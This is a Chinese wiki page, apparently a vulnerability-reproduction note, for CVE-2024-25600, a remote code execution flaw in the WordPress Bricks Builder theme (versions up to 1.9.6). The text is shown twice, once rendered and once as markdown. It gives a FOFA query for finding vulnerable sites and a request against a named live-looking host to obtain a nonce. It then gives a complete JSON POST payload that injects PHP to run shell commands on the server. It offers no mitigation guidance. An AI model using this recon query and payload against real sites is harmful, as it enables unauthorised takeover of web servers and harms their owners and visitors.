fofamini-wiki

登录白背景

源码

WordPress Bricks Builder RCE(CVE-2024-25600)

一、漏洞描述

<font style="color:rgb(51, 51, 51);">Bricks Builder是一款面向WordPress网站建设的可视化编辑器，使用简单、功能强大。它提供了多种布局和预设模板，可以帮助用户快速创建专业、美观的网站。该产品存在远程代码执行漏洞。</font>

二、影响版本

Bricks Builder <= 1.9.6

三、资产测绘

fofa：body="/wp-content/themes/bricks/"

四、漏洞复现

访问得到nonce值

GET / HTTP/2
Host: bricks.gajdosik.co
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

使用得到的nonce值构造数据包进行发送

POST /wp-json/bricks/v1/render_element HTTP/2
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 358
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "上一步得到的nonce值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

原文: https://www.yuque.com/xiaokp7/ocvun2/fzdvgfp9n3gwt1n6

# WordPress Bricks Builder RCE(CVE-2024-25600)

### 一、漏洞描述
<font style="color:rgb(51, 51, 51);">Bricks Builder是一款面向WordPress网站建设的可视化编辑器，使用简单、功能强大。它提供了多种布局和预设模板，可以帮助用户快速创建专业、美观的网站。该产品存在远程代码执行漏洞。</font>

### 二、影响版本
+ Bricks Builder <= 1.9.6

### 三、资产测绘
+ fofa：`body="/wp-content/themes/bricks/"`

### 四、漏洞复现
访问得到nonce值

```plain
GET / HTTP/2
Host: bricks.gajdosik.co
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

```

![1708676692206-b1261a7b-d412-4d3a-a258-894a3782688e.png](./img/Fpr5wMnJ6eL0xYyJ/1708676692206-b1261a7b-d412-4d3a-a258-894a3782688e-821475.png)使用得到的nonce值构造数据包进行发送

```plain
POST /wp-json/bricks/v1/render_element HTTP/2
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 358
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "上一步得到的nonce值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

```

![1708676543408-77eb61c6-d84b-440d-93c3-4cd35bb46684.png](./img/Fpr5wMnJ6eL0xYyJ/1708676543408-77eb61c6-d84b-440d-93c3-4cd35bb46684-217152.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fzdvgfp9n3gwt1n6>